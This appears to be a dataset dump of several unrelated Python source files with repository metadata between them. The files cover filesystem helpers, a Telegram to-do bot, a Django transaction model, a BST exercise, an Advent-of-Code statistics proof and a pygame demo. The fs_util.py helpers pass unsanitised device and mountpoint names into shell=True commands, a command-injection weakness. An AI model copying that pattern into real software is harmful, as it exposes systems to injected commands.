fs_stat = os.statvfs(path)
return {
"fs_size": fs_stat.f_frsize * fs_stat.f_blocks,
"fs_avail": fs_stat.f_frsize * fs_stat.f_bavail,
"fs_files": fs_stat.f_files,
"fs_files_avail": fs_stat.f_favail,
}
def device_stats(dev):
output = subprocess.run(
f"blockdev --getsize64 {dev}", shell=True, check=True, capture_output=True
).stdout.decode()
dev_size = int(output)
return {"dev_size": dev_size}
def dev_to_mountpoint(dev_name):
try:
output = subprocess.run(
f"findmnt --json --first-only {dev_name}",
shell=True,
check=True,
capture_output=True,
).stdout.decode()
data = json.loads(output)
return data["filesystems"][0]["target"]
except subprocess.CalledProcessError:
return None
def mountpoint_to_dev(mountpoint):
res = subprocess.run(
f"findmnt --json --first-only --nofsroot --mountpoint {mountpoint}",
shell=True,
capture_output=True,
)
if res.returncode != 0:
return None
data = json.loads(res.stdout.decode().strip())
return data["filesystems"][0]["source"]
| <filename>fs_util.py
import json
import os
import subprocess
def path_stats(path):
fs_stat = os.statvfs(path)
return {
"fs_size": fs_stat.f_frsize * fs_stat.f_blocks,
"fs_avail": fs_stat.f_frsize * fs_stat.f_bavail,
"fs_files": fs_stat.f_files,
"fs_files_avail": fs_stat.f_favail,
}
def device_stats(dev):
output = subprocess.run(
f"blockdev --getsize64 {dev}", shell=True, check=True, capture_output=True
).stdout.decode()
dev_size = int(output)
return {"dev_size": dev_size}
def dev_to_mountpoint(dev_name):
try:
output = subprocess.run(
f"findmnt --json --first-only {dev_name}",
shell=True,
check=True,
capture_output=True,
).stdout.decode()
data = json.loads(output)
return data["filesystems"][0]["target"]
except subprocess.CalledProcessError:
return None
def mountpoint_to_dev(mountpoint):
res = subprocess.run(
f"findmnt --json --first-only --nofsroot --mountpoint {mountpoint}",
shell=True,
capture_output=True,
)
if res.returncode != 0:
return None
data = json.loads(res.stdout.decode().strip())
return data["filesystems"][0]["source"]
| none | 1 | 2.168661 | 2 | |
menu.py | sarfarazstark/To-Do-Bot | 4 | 6623874 | <reponame>sarfarazstark/To-Do-Bot
"""Module for sending menus to user"""
from keyboards import get_menu_keyboard, get_tasks_keyboard
from messages import get_signboard, get_message
from languages import get_user_language
# Function for sending main menu
def send_main_menu(update):
# Get user language
language = get_user_language(update=update, short=True)
# Send menu
update.message.reply_text(
get_signboard("main_menu", language),
reply_markup=get_menu_keyboard("main_menu", language)
)
# Function for sending editor menu
def send_editor_menu(update):
# Get user language
language = get_user_language(update=update, short=True)
# Send menu
update.message.reply_text(
get_signboard("editor_menu", language),
reply_markup=get_menu_keyboard("editor_menu", language)
)
# Function for sending settings menu
def send_settings_menu(update):
# Get user language
language = get_user_language(update=update, short=True)
# Send menu
update.message.reply_text(
get_signboard("settings_menu", language),
reply_markup=get_menu_keyboard("settings_menu", language)
)
# Function for sending edit task menu
def send_edit_mode_menu(update):
# Get user language
language = get_user_language(update=update, short=True)
# Send menu
update.message.reply_text(
get_message("choice_action", language),
reply_markup=get_menu_keyboard("edit_task_menu", language)
)
# Function for sending menu for tasks choice
def send_choice_tasks_menu(update, page=0):
# Get user id and user language
user_id = update.message.from_user.id
language = get_user_language(user_id=user_id, short=True)
# Get tasks keyboard
keyboard = get_tasks_keyboard(user_id, language, page=page)
# If keyboard doesn't exist - return False
if not keyboard:
return False
# Send menu
update.message.reply_text(
get_message("choice_task", language),
reply_markup=keyboard
)
# Return True, if message sent
return True
| """Module for sending menus to user"""
from keyboards import get_menu_keyboard, get_tasks_keyboard
from messages import get_signboard, get_message
from languages import get_user_language
# Function for sending main menu
def send_main_menu(update):
# Get user language
language = get_user_language(update=update, short=True)
# Send menu
update.message.reply_text(
get_signboard("main_menu", language),
reply_markup=get_menu_keyboard("main_menu", language)
)
# Function for sending editor menu
def send_editor_menu(update):
# Get user language
language = get_user_language(update=update, short=True)
# Send menu
update.message.reply_text(
get_signboard("editor_menu", language),
reply_markup=get_menu_keyboard("editor_menu", language)
)
# Function for sending settings menu
def send_settings_menu(update):
# Get user language
language = get_user_language(update=update, short=True)
# Send menu
update.message.reply_text(
get_signboard("settings_menu", language),
reply_markup=get_menu_keyboard("settings_menu", language)
)
# Function for sending edit task menu
def send_edit_mode_menu(update):
# Get user language
language = get_user_language(update=update, short=True)
# Send menu
update.message.reply_text(
get_message("choice_action", language),
reply_markup=get_menu_keyboard("edit_task_menu", language)
)
# Function for sending menu for tasks choice
def send_choice_tasks_menu(update, page=0):
# Get user id and user language
user_id = update.message.from_user.id
language = get_user_language(user_id=user_id, short=True)
# Get tasks keyboard
keyboard = get_tasks_keyboard(user_id, language, page=page)
# If keyboard doesn't exist - return False
if not keyboard:
return False
# Send menu
update.message.reply_text(
get_message("choice_task", language),
reply_markup=keyboard
)
# Return True, if message sent
return True | en | 0.686723 | Module for sending menus to user # Function for sending main menu # Get user language # Send menu # Function for sending editor menu # Get user language # Send menu # Function for sending settings menu # Get user language # Send menu # Function for sending edit task menu # Get user language # Send menu # Function for sending menu for tasks choice # Get user id and user language # Get tasks keyboard # If keyboard doesn't exist - return False # Send menu # Return True, if message sent | 2.785647 | 3 |
ripple_api/models.py | 42cc/ripple_api | 7 | 6623875 | # -*- coding: utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
from model_utils import ModelTracker
from signals import transaction_status_changed, transaction_failure_send
class Transaction(models.Model):
RECEIVED = 0
PROCESSED = 1
MUST_BE_RETURN = 2
RETURNING = 3
RETURNED = 4
PENDING = 5
SUBMITTED = 6
FAILURE = 7
SUCCESS = 8
CREATED = 9
SUCCESS_PROCESSED = 10
FAIL_FIXED = 100
STATUS_CHOICES = (
(RECEIVED, _(u'Transaction received')),
(PROCESSED, _(u'Transaction was processed')),
(MUST_BE_RETURN, _(u'This transaction must be returned to user')),
(RETURNING, _(u'Created new transaction for returning')),
(RETURNED, _(u'Transaction was returned')),
(PENDING, _(u'Pending to submit')),
(SUBMITTED, _(u'Transaction was submitted')),
(FAILURE, _(u'Transaction was failed')),
(SUCCESS, _(u'Transaction was completed successfully')),
(CREATED, _(u'Transaction was created but not sign')),
(SUCCESS_PROCESSED,
_(u'Transaction was processed after successful submit')),
(FAIL_FIXED, _(u'The failed transaction was fixed by a new retry'))
)
account = models.CharField(max_length=100)
destination = models.CharField(max_length=100)
hash = models.CharField(max_length=100, blank=True)
tx_blob = models.TextField(blank=True)
currency = models.CharField(max_length=3)
issuer = models.CharField(max_length=100)
value = models.CharField(max_length=100)
source_tag = models.IntegerField(null=True, blank=True)
destination_tag = models.IntegerField(null=True, blank=True)
ledger_index = models.IntegerField(null=True, blank=True)
status = models.SmallIntegerField(choices=STATUS_CHOICES, default=RECEIVED)
parent = models.ForeignKey('self', null=True, blank=True,
related_name='returning_transaction')
created = models.DateTimeField(auto_now_add=True)
status_tracker = ModelTracker(fields=['status'])
def __unicode__(self):
return u'[%s] %s. %s %s from %s to %s' % (
self.pk, self.created, self.value,
self.currency, self.account, self.destination
)
def save(self, *args, **kwargs):
created = bool(self.pk)
super(Transaction, self).save(*args, **kwargs)
if created and self.status_tracker.previous('status') is not None:
transaction_status_changed.send(
sender=self.__class__,
instance=self,
old_status=self.status_tracker.previous('status')
)
if self.status == self.FAILURE:
transaction_failure_send.send(sender=self.__class__, instance=self)
| # -*- coding: utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
from model_utils import ModelTracker
from signals import transaction_status_changed, transaction_failure_send
class Transaction(models.Model):
RECEIVED = 0
PROCESSED = 1
MUST_BE_RETURN = 2
RETURNING = 3
RETURNED = 4
PENDING = 5
SUBMITTED = 6
FAILURE = 7
SUCCESS = 8
CREATED = 9
SUCCESS_PROCESSED = 10
FAIL_FIXED = 100
STATUS_CHOICES = (
(RECEIVED, _(u'Transaction received')),
(PROCESSED, _(u'Transaction was processed')),
(MUST_BE_RETURN, _(u'This transaction must be returned to user')),
(RETURNING, _(u'Created new transaction for returning')),
(RETURNED, _(u'Transaction was returned')),
(PENDING, _(u'Pending to submit')),
(SUBMITTED, _(u'Transaction was submitted')),
(FAILURE, _(u'Transaction was failed')),
(SUCCESS, _(u'Transaction was completed successfully')),
(CREATED, _(u'Transaction was created but not sign')),
(SUCCESS_PROCESSED,
_(u'Transaction was processed after successful submit')),
(FAIL_FIXED, _(u'The failed transaction was fixed by a new retry'))
)
account = models.CharField(max_length=100)
destination = models.CharField(max_length=100)
hash = models.CharField(max_length=100, blank=True)
tx_blob = models.TextField(blank=True)
currency = models.CharField(max_length=3)
issuer = models.CharField(max_length=100)
value = models.CharField(max_length=100)
source_tag = models.IntegerField(null=True, blank=True)
destination_tag = models.IntegerField(null=True, blank=True)
ledger_index = models.IntegerField(null=True, blank=True)
status = models.SmallIntegerField(choices=STATUS_CHOICES, default=RECEIVED)
parent = models.ForeignKey('self', null=True, blank=True,
related_name='returning_transaction')
created = models.DateTimeField(auto_now_add=True)
status_tracker = ModelTracker(fields=['status'])
def __unicode__(self):
return u'[%s] %s. %s %s from %s to %s' % (
self.pk, self.created, self.value,
self.currency, self.account, self.destination
)
def save(self, *args, **kwargs):
created = bool(self.pk)
super(Transaction, self).save(*args, **kwargs)
if created and self.status_tracker.previous('status') is not None:
transaction_status_changed.send(
sender=self.__class__,
instance=self,
old_status=self.status_tracker.previous('status')
)
if self.status == self.FAILURE:
transaction_failure_send.send(sender=self.__class__, instance=self)
| en | 0.769321 | # -*- coding: utf-8 -*- | 1.988554 | 2 |
bst_min_value.py | alexhla/programming-problems-in-python | 0 | 6623876 | <reponame>alexhla/programming-problems-in-python<gh_stars>0
class Node:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def bstmin(self, A):
while A.left != None: # iterative solution will suffice
A = A.left # as no need to keep track of anything
return A.val # just traverse to left most node
obj = Solution()
root = Node(4)
root.left = Node(2)
root.right = Node(6)
root.left.left = Node(1)
root.left.right = Node(3)
root.right.left = Node(5)
root.right.right = Node(7)
print("Number of Tree Nodes is {}" .format(obj.bstmin(root))) | class Node:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def bstmin(self, A):
while A.left != None: # iterative solution will suffice
A = A.left # as no need to keep track of anything
return A.val # just traverse to left most node
obj = Solution()
root = Node(4)
root.left = Node(2)
root.right = Node(6)
root.left.left = Node(1)
root.left.right = Node(3)
root.right.left = Node(5)
root.right.right = Node(7)
print("Number of Tree Nodes is {}" .format(obj.bstmin(root))) | en | 0.969297 | # iterative solution will suffice # as no need to keep track of anything # just traverse to left most node | 3.807601 | 4 |
aoc-statistics.py | pavelrusakovich/statistics_showcase | 0 | 6623877 | #!/bin/python3
import random
from typing import List, Dict
from statistics import mean, median
from operator import itemgetter
from sys import maxsize
"""
Suppose, a = [a[0], a[1], ... a[n-1]] , a[i] is a real number
F(x) = sum( |a[i] - x| for i in (0..n-1) )
G(x) = sum( (a[i] - x)(a[i] - x - 1)/2 for i in (0..n-1) )
Part 1 - Minimize F(x) for real number x
Notice ,that |x| = x * sgn(x), where
sgn(x) = 1 if x > 0,
sgn(x) = 0 if x = 0,
sgn(x) = -1 if x < 0
sgn'(x) = 0 for all x except 0. For x = 0 sgn(x) is not differentiable.
Global minimum of F exists as for extremely large |x|, F(x) -> infinity.
Then Global minimum of F can be found among the points where F'(x) = 0 or doesn't exist.
F'(x) = sum( |a[i] - x| for i in (0..n-1) )' =
= sum( (a[i] - x) * sgn(a[i] - x) for i in (0..n-1) )' =
= sum( -1 * sgn(a[i] - x) + 0 for i in (0..n-1)) =
= sum( sgn(x - a[i]) for i in (0..n-1)) for all x where F'(x) is defined.
F'(x) is not defined whenever sgn(a[i] - x) = 0, so not defined for x in a,
thus, all a[i] are candidates for global minimum. However, we can disqualify any point that is not the local minimum.
Let's re-enumerate a[i] so that they are perfectly ordered and depict them on the X axis.
-----a[0]----a[1]----a[2]---...---a[n-2]----a[n-1]-----
Let's calculate the sign of F'(x) for every interval. This splits into two cases.
Case 1: n is odd. Let's assume n = 2m + 1.
-----a[0]----a[1]----a[2]----...----a[m-1]----a[m]----a[m+1]----...----a[n-2]----a[n-1]-----
2m+1 2m-1 2m-3 2m-5 3 1 -1 -3 3-2m 1-2m -2m-1 <- F'(x) for x in interval
From these calculations it's clear that a[m] is the only candidate for which F'(x) changes sign, so it's the only
local minimum of F, therefore, a global minimum. Notably, given the re-enumeration. a[m] is a sample median.
Case 2: n is even. Let's assume n = 2m.
-----a[0]----a[1]----a[2]----...----a[m-1]----a[m]----a[m+1]----...----a[n-2]----a[n-1]-----
2m 2m-2 2m-4 2m-6 4 2 0 -2 4-2m 2-2m -2m <- F'(x) for x in interval
F'(x) = 0 for entire interval ( a[m], a[m+1] ), so global minimum is in [ a[m], a[m+1] ] as all other candidates are
disqualified.
It appears, that in this case every point on that interval yields the global minimum:
To cut the proof short, I'll put some intuitively clear observations that will take too much time and space to proof
in rigorous way.
If a consists of two elements, b and c (c > b), min(F) is achieved for every b <= x <= c
If a consists on 2m elements, b, b,..b, c, c,..c (b and c repeat m times), then min(F) is achieved for every b <= x <= c
If a consists of 2m elements b-e[0], b-e[1], b-e[m-1], b, c, c+e[m+2], c+e[m+3], .. c+e[2m] (where e[i] > 0), then
since global minimum is achieved for some b <= x <= c, then at least,
elements less than b need to burn fuel to get to b and, likewise, all elements greater than c need to
burn fuel at least to get to c, after which the problem is reduced to the previous case.
Note: x = (b + c)/2 is by definition a median of even-sized sample.
######################################
Part 2 - Minimize G(x)
This is even easier, so I'll give less explanation here.
G(x) = sum( (a[i] - x)(a[i] - x - 1)/2 for i in (0..n-1) )
Global minimum exists, G is differentiable for all real x.
G'(x) = sum( -1* (a[i] - x - 1)/2 - (a[i] - x)/2 for i in (0..n-1) ) =
= sum( x - a[i] + 1/2 for i in (0..n-1) ) = n * x + sum( a[i]for i in (0..n-1) ) + n/2
G'(x) = 0 <=> x = (2 * sum( a[i]for i in (0..n-1) ) - n) / 2n = mean(a) - 1/2.
Note: answer is not exactly a mean due to discretization effect: for H(x) = sum( (a[i] - x)**2 for i in (0..n-1)),
minimum will be achieved exactly at mean.
Note: after the problem is solved in continuous form, translating it into discrete form is very easy,
but must not be overlooked.
"""
class RandomList:
length: int
upper_bound: int
lower_bound: int
_items: List[int]
_compressed_items: Dict
def mean(self):
return round(mean(self._items) - 1 / 2)
def median(self):
return median(self._items)
def __init__(self, items_c, lo, hi):
self._items = []
self._compressed_items = {}
self.lower_bound = lo
self.upper_bound = hi
for i in range(items_c):
item = random.randint(lo, hi)
self._items.append(item)
if item in self._compressed_items:
self._compressed_items[item] += 1
else:
self._compressed_items[item] = 1
def linear_fuel_burn(self, target):
return sum(abs(pos - target) * count for pos, count in self._compressed_items.items())
def minimum_burn(self, func):
min_burn, pos_min_burn = min(
[(func(j), j) for j in range(self.lower_bound, self.upper_bound)]
, key=itemgetter(0))
return min_burn
def arithmetic_progression_burn(self, target):
return sum(
abs((pos - target) * (pos - target - 1) / 2) * count for pos, count in self._compressed_items.items())
def __str__(self):
return self._items.__str__()
if __name__ == "__main__":
seed = random.randrange(maxsize)
print(f'Random seed: {seed}')
random.seed(seed)
for i in range(10):
size = random.randint(1, 100)
sample = RandomList(size, 0, random.randint(10, 1000))
passed = True
print(f' \nTEST {i + 1} \n List of {size} items: \n {sample}')
try:
assert (sample.minimum_burn(sample.linear_fuel_burn) == sample.linear_fuel_burn(sample.median()))
except AssertionError as e:
print(f'FAILED: Median was not the optimal alignment point for linear fuel consumption \n '
f'Median yields {sample.linear_fuel_burn(sample.median())}, '
f'optimum is {sample.minimum_burn(sample.linear_fuel_burn)}')
passed = False
try:
assert (sample.minimum_burn(sample.arithmetic_progression_burn) ==
sample.arithmetic_progression_burn(sample.mean()))
except AssertionError as e:
print(f'FAILED: "Mean" was not the optimal alignment point for arithmetic-progressive fuel consumption \n '
f'"Mean" yields {sample.arithmetic_progression_burn(sample.mean())}, '
f'optimum is {sample.minimum_burn(sample.arithmetic_progression_burn)} ')
passed = False
if passed:
print("PASSED")
| #!/bin/python3
import random
from typing import List, Dict
from statistics import mean, median
from operator import itemgetter
from sys import maxsize
"""
Suppose, a = [a[0], a[1], ... a[n-1]] , a[i] is a real number
F(x) = sum( |a[i] - x| for i in (0..n-1) )
G(x) = sum( (a[i] - x)(a[i] - x - 1)/2 for i in (0..n-1) )
Part 1 - Minimize F(x) for real number x
Notice ,that |x| = x * sgn(x), where
sgn(x) = 1 if x > 0,
sgn(x) = 0 if x = 0,
sgn(x) = -1 if x < 0
sgn'(x) = 0 for all x except 0. For x = 0 sgn(x) is not differentiable.
Global minimum of F exists as for extremely large |x|, F(x) -> infinity.
Then Global minimum of F can be found among the points where F'(x) = 0 or doesn't exist.
F'(x) = sum( |a[i] - x| for i in (0..n-1) )' =
= sum( (a[i] - x) * sgn(a[i] - x) for i in (0..n-1) )' =
= sum( -1 * sgn(a[i] - x) + 0 for i in (0..n-1)) =
= sum( sgn(x - a[i]) for i in (0..n-1)) for all x where F'(x) is defined.
F'(x) is not defined whenever sgn(a[i] - x) = 0, so not defined for x in a,
thus, all a[i] are candidates for global minimum. However, we can disqualify any point that is not the local minimum.
Let's re-enumerate a[i] so that they are perfectly ordered and depict them on the X axis.
-----a[0]----a[1]----a[2]---...---a[n-2]----a[n-1]-----
Let's calculate the sign of F'(x) for every interval. This splits into two cases.
Case 1: n is odd. Let's assume n = 2m + 1.
-----a[0]----a[1]----a[2]----...----a[m-1]----a[m]----a[m+1]----...----a[n-2]----a[n-1]-----
2m+1 2m-1 2m-3 2m-5 3 1 -1 -3 3-2m 1-2m -2m-1 <- F'(x) for x in interval
From these calculations it's clear that a[m] is the only candidate for which F'(x) changes sign, so it's the only
local minimum of F, therefore, a global minimum. Notably, given the re-enumeration. a[m] is a sample median.
Case 2: n is even. Let's assume n = 2m.
-----a[0]----a[1]----a[2]----...----a[m-1]----a[m]----a[m+1]----...----a[n-2]----a[n-1]-----
2m 2m-2 2m-4 2m-6 4 2 0 -2 4-2m 2-2m -2m <- F'(x) for x in interval
F'(x) = 0 for entire interval ( a[m], a[m+1] ), so global minimum is in [ a[m], a[m+1] ] as all other candidates are
disqualified.
It appears, that in this case every point on that interval yields the global minimum:
To cut the proof short, I'll put some intuitively clear observations that will take too much time and space to proof
in rigorous way.
If a consists of two elements, b and c (c > b), min(F) is achieved for every b <= x <= c
If a consists on 2m elements, b, b,..b, c, c,..c (b and c repeat m times), then min(F) is achieved for every b <= x <= c
If a consists of 2m elements b-e[0], b-e[1], b-e[m-1], b, c, c+e[m+2], c+e[m+3], .. c+e[2m] (where e[i] > 0), then
since global minimum is achieved for some b <= x <= c, then at least,
elements less than b need to burn fuel to get to b and, likewise, all elements greater than c need to
burn fuel at least to get to c, after which the problem is reduced to the previous case.
Note: x = (b + c)/2 is by definition a median of even-sized sample.
######################################
Part 2 - Minimize G(x)
This is even easier, so I'll give less explanation here.
G(x) = sum( (a[i] - x)(a[i] - x - 1)/2 for i in (0..n-1) )
Global minimum exists, G is differentiable for all real x.
G'(x) = sum( -1* (a[i] - x - 1)/2 - (a[i] - x)/2 for i in (0..n-1) ) =
= sum( x - a[i] + 1/2 for i in (0..n-1) ) = n * x + sum( a[i]for i in (0..n-1) ) + n/2
G'(x) = 0 <=> x = (2 * sum( a[i]for i in (0..n-1) ) - n) / 2n = mean(a) - 1/2.
Note: answer is not exactly a mean due to discretization effect: for H(x) = sum( (a[i] - x)**2 for i in (0..n-1)),
minimum will be achieved exactly at mean.
Note: after the problem is solved in continuous form, translating it into discrete form is very easy,
but must not be overlooked.
"""
class RandomList:
length: int
upper_bound: int
lower_bound: int
_items: List[int]
_compressed_items: Dict
def mean(self):
return round(mean(self._items) - 1 / 2)
def median(self):
return median(self._items)
def __init__(self, items_c, lo, hi):
self._items = []
self._compressed_items = {}
self.lower_bound = lo
self.upper_bound = hi
for i in range(items_c):
item = random.randint(lo, hi)
self._items.append(item)
if item in self._compressed_items:
self._compressed_items[item] += 1
else:
self._compressed_items[item] = 1
def linear_fuel_burn(self, target):
return sum(abs(pos - target) * count for pos, count in self._compressed_items.items())
def minimum_burn(self, func):
min_burn, pos_min_burn = min(
[(func(j), j) for j in range(self.lower_bound, self.upper_bound)]
, key=itemgetter(0))
return min_burn
def arithmetic_progression_burn(self, target):
return sum(
abs((pos - target) * (pos - target - 1) / 2) * count for pos, count in self._compressed_items.items())
def __str__(self):
return self._items.__str__()
if __name__ == "__main__":
seed = random.randrange(maxsize)
print(f'Random seed: {seed}')
random.seed(seed)
for i in range(10):
size = random.randint(1, 100)
sample = RandomList(size, 0, random.randint(10, 1000))
passed = True
print(f' \nTEST {i + 1} \n List of {size} items: \n {sample}')
try:
assert (sample.minimum_burn(sample.linear_fuel_burn) == sample.linear_fuel_burn(sample.median()))
except AssertionError as e:
print(f'FAILED: Median was not the optimal alignment point for linear fuel consumption \n '
f'Median yields {sample.linear_fuel_burn(sample.median())}, '
f'optimum is {sample.minimum_burn(sample.linear_fuel_burn)}')
passed = False
try:
assert (sample.minimum_burn(sample.arithmetic_progression_burn) ==
sample.arithmetic_progression_burn(sample.mean()))
except AssertionError as e:
print(f'FAILED: "Mean" was not the optimal alignment point for arithmetic-progressive fuel consumption \n '
f'"Mean" yields {sample.arithmetic_progression_burn(sample.mean())}, '
f'optimum is {sample.minimum_burn(sample.arithmetic_progression_burn)} ')
passed = False
if passed:
print("PASSED")
| en | 0.864837 | #!/bin/python3 Suppose, a = [a[0], a[1], ... a[n-1]] , a[i] is a real number F(x) = sum( |a[i] - x| for i in (0..n-1) ) G(x) = sum( (a[i] - x)(a[i] - x - 1)/2 for i in (0..n-1) ) Part 1 - Minimize F(x) for real number x Notice ,that |x| = x * sgn(x), where sgn(x) = 1 if x > 0, sgn(x) = 0 if x = 0, sgn(x) = -1 if x < 0 sgn'(x) = 0 for all x except 0. For x = 0 sgn(x) is not differentiable. Global minimum of F exists as for extremely large |x|, F(x) -> infinity. Then Global minimum of F can be found among the points where F'(x) = 0 or doesn't exist. F'(x) = sum( |a[i] - x| for i in (0..n-1) )' = = sum( (a[i] - x) * sgn(a[i] - x) for i in (0..n-1) )' = = sum( -1 * sgn(a[i] - x) + 0 for i in (0..n-1)) = = sum( sgn(x - a[i]) for i in (0..n-1)) for all x where F'(x) is defined. F'(x) is not defined whenever sgn(a[i] - x) = 0, so not defined for x in a, thus, all a[i] are candidates for global minimum. However, we can disqualify any point that is not the local minimum. Let's re-enumerate a[i] so that they are perfectly ordered and depict them on the X axis. -----a[0]----a[1]----a[2]---...---a[n-2]----a[n-1]----- Let's calculate the sign of F'(x) for every interval. This splits into two cases. Case 1: n is odd. Let's assume n = 2m + 1. -----a[0]----a[1]----a[2]----...----a[m-1]----a[m]----a[m+1]----...----a[n-2]----a[n-1]----- 2m+1 2m-1 2m-3 2m-5 3 1 -1 -3 3-2m 1-2m -2m-1 <- F'(x) for x in interval From these calculations it's clear that a[m] is the only candidate for which F'(x) changes sign, so it's the only local minimum of F, therefore, a global minimum. Notably, given the re-enumeration. a[m] is a sample median. Case 2: n is even. Let's assume n = 2m. -----a[0]----a[1]----a[2]----...----a[m-1]----a[m]----a[m+1]----...----a[n-2]----a[n-1]----- 2m 2m-2 2m-4 2m-6 4 2 0 -2 4-2m 2-2m -2m <- F'(x) for x in interval F'(x) = 0 for entire interval ( a[m], a[m+1] ), so global minimum is in [ a[m], a[m+1] ] as all other candidates are disqualified. It appears, that in this case every point on that interval yields the global minimum: To cut the proof short, I'll put some intuitively clear observations that will take too much time and space to proof in rigorous way. If a consists of two elements, b and c (c > b), min(F) is achieved for every b <= x <= c If a consists on 2m elements, b, b,..b, c, c,..c (b and c repeat m times), then min(F) is achieved for every b <= x <= c If a consists of 2m elements b-e[0], b-e[1], b-e[m-1], b, c, c+e[m+2], c+e[m+3], .. c+e[2m] (where e[i] > 0), then since global minimum is achieved for some b <= x <= c, then at least, elements less than b need to burn fuel to get to b and, likewise, all elements greater than c need to burn fuel at least to get to c, after which the problem is reduced to the previous case. Note: x = (b + c)/2 is by definition a median of even-sized sample. ###################################### Part 2 - Minimize G(x) This is even easier, so I'll give less explanation here. G(x) = sum( (a[i] - x)(a[i] - x - 1)/2 for i in (0..n-1) ) Global minimum exists, G is differentiable for all real x. G'(x) = sum( -1* (a[i] - x - 1)/2 - (a[i] - x)/2 for i in (0..n-1) ) = = sum( x - a[i] + 1/2 for i in (0..n-1) ) = n * x + sum( a[i]for i in (0..n-1) ) + n/2 G'(x) = 0 <=> x = (2 * sum( a[i]for i in (0..n-1) ) - n) / 2n = mean(a) - 1/2. Note: answer is not exactly a mean due to discretization effect: for H(x) = sum( (a[i] - x)**2 for i in (0..n-1)), minimum will be achieved exactly at mean. Note: after the problem is solved in continuous form, translating it into discrete form is very easy, but must not be overlooked. | 3.357241 | 3 |
Section 4/Video1_3_draw.py | PacktPublishing/-Learn-Python-Programming-with-Games | 3 | 6623878 | <reponame>PacktPublishing/-Learn-Python-Programming-with-Games<gh_stars>1-10
'''
Created on Sep 2, 2018
@author: <NAME>
Space background image was downloaded from:
--------------------------------------
https://opengameart.org
No attribution required for this png file.
'''
import pygame
from pygame.locals import *
from os import path
pygame.init()
pygame.display.set_caption('PyGame - Starships and Asteroids game')
WIDTH, HEIGHT = 900, 600 # <== adjust size to your liking
game_surface = pygame.display.set_mode((WIDTH, HEIGHT))
fps_clock = pygame.time.Clock() # create clock instance
FPS = 60 # frames per second
green = pygame.Color('green') # define color
# line corner coordinates
LEFT_BOTTOM_X = (10, HEIGHT -10)
LEFT_BOTTOM_Y = (WIDTH -10, HEIGHT -10)
LEFT_TOP_X = (100, 10)
LEFT_TOP_Y = (WIDTH - 100, 10)
BOTTOM_LINE = (LEFT_BOTTOM_X, LEFT_BOTTOM_Y) # tuple of coordinates
TOP_LINE = (LEFT_TOP_X, LEFT_TOP_Y)
LEFT_LINE = (LEFT_BOTTOM_X, LEFT_TOP_X)
RIGHT_LINE = (LEFT_BOTTOM_Y, LEFT_TOP_Y)
def run_3d_game():
bg_img = pygame.image.load(path.join('images', 'space_background.png'))
game_surface.blit(bg_img, (0, 0))
# game loop ------------------------------------------------------------
run_game = True
while run_game:
fps_clock.tick(FPS)
for event in pygame.event.get():
if event.type == QUIT:
run_game = False
game_surface.blit(bg_img, (0, 0))
pygame.draw.line(game_surface, green, *BOTTOM_LINE, 10) # use * to unpack tuple for (start_pos, end_pos)
pygame.draw.line(game_surface, green, *TOP_LINE, 6) # line(Surface, color, start_pos, end_pos, width=1) -> Rect
pygame.draw.line(game_surface, green, *LEFT_LINE, 6)
pygame.draw.line(game_surface, green, *RIGHT_LINE, 6)
pygame.display.update()
# End game loop --------------------------------------------------------
pygame.quit()
if __name__ == '__main__':
run_3d_game()
| '''
Created on Sep 2, 2018
@author: <NAME>
Space background image was downloaded from:
--------------------------------------
https://opengameart.org
No attribution required for this png file.
'''
import pygame
from pygame.locals import *
from os import path
pygame.init()
pygame.display.set_caption('PyGame - Starships and Asteroids game')
WIDTH, HEIGHT = 900, 600 # <== adjust size to your liking
game_surface = pygame.display.set_mode((WIDTH, HEIGHT))
fps_clock = pygame.time.Clock() # create clock instance
FPS = 60 # frames per second
green = pygame.Color('green') # define color
# line corner coordinates
LEFT_BOTTOM_X = (10, HEIGHT -10)
LEFT_BOTTOM_Y = (WIDTH -10, HEIGHT -10)
LEFT_TOP_X = (100, 10)
LEFT_TOP_Y = (WIDTH - 100, 10)
BOTTOM_LINE = (LEFT_BOTTOM_X, LEFT_BOTTOM_Y) # tuple of coordinates
TOP_LINE = (LEFT_TOP_X, LEFT_TOP_Y)
LEFT_LINE = (LEFT_BOTTOM_X, LEFT_TOP_X)
RIGHT_LINE = (LEFT_BOTTOM_Y, LEFT_TOP_Y)
def run_3d_game():
bg_img = pygame.image.load(path.join('images', 'space_background.png'))
game_surface.blit(bg_img, (0, 0))
# game loop ------------------------------------------------------------
run_game = True
while run_game:
fps_clock.tick(FPS)
for event in pygame.event.get():
if event.type == QUIT:
run_game = False
game_surface.blit(bg_img, (0, 0))
pygame.draw.line(game_surface, green, *BOTTOM_LINE, 10) # use * to unpack tuple for (start_pos, end_pos)
pygame.draw.line(game_surface, green, *TOP_LINE, 6) # line(Surface, color, start_pos, end_pos, width=1) -> Rect
pygame.draw.line(game_surface, green, *LEFT_LINE, 6)
pygame.draw.line(game_surface, green, *RIGHT_LINE, 6)
pygame.display.update()
# End game loop --------------------------------------------------------
pygame.quit()
if __name__ == '__main__':
run_3d_game() | en | 0.568182 | Created on Sep 2, 2018 @author: <NAME> Space background image was downloaded from: -------------------------------------- https://opengameart.org No attribution required for this png file. # <== adjust size to your liking # create clock instance # frames per second # define color # line corner coordinates # tuple of coordinates # game loop ------------------------------------------------------------ # use * to unpack tuple for (start_pos, end_pos) # line(Surface, color, start_pos, end_pos, width=1) -> Rect # End game loop -------------------------------------------------------- | 2.930305 | 3 |
tests/helpers.py | J-Obog/littlekv | 4 | 6623879 | from typing import Tuple
import subprocess
import time
import os
import signal
import sys
def launch_client_proc(cmd: str, conn_delay: int = 0.25) -> Tuple[int, int, str]:
time.sleep(conn_delay)
client_proc = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE)
exit_code = client_proc.wait()
output = client_proc.communicate()[0].decode('utf-8').strip()
return (client_proc.pid, exit_code, output)
def launch_server_proc(cmd: str) -> Tuple[int]:
server_proc = subprocess.Popen(cmd.split())
return server_proc.pid
def kill_server_proc(pid: str, timeout: int = 0.25):
if sys.platform[:-2] == 'win':
os.kill(pid, signal.CTRL_C_EVENT)
else:
os.kill(pid, signal.SIGINT)
time.sleep(timeout) | from typing import Tuple
import subprocess
import time
import os
import signal
import sys
def launch_client_proc(cmd: str, conn_delay: int = 0.25) -> Tuple[int, int, str]:
time.sleep(conn_delay)
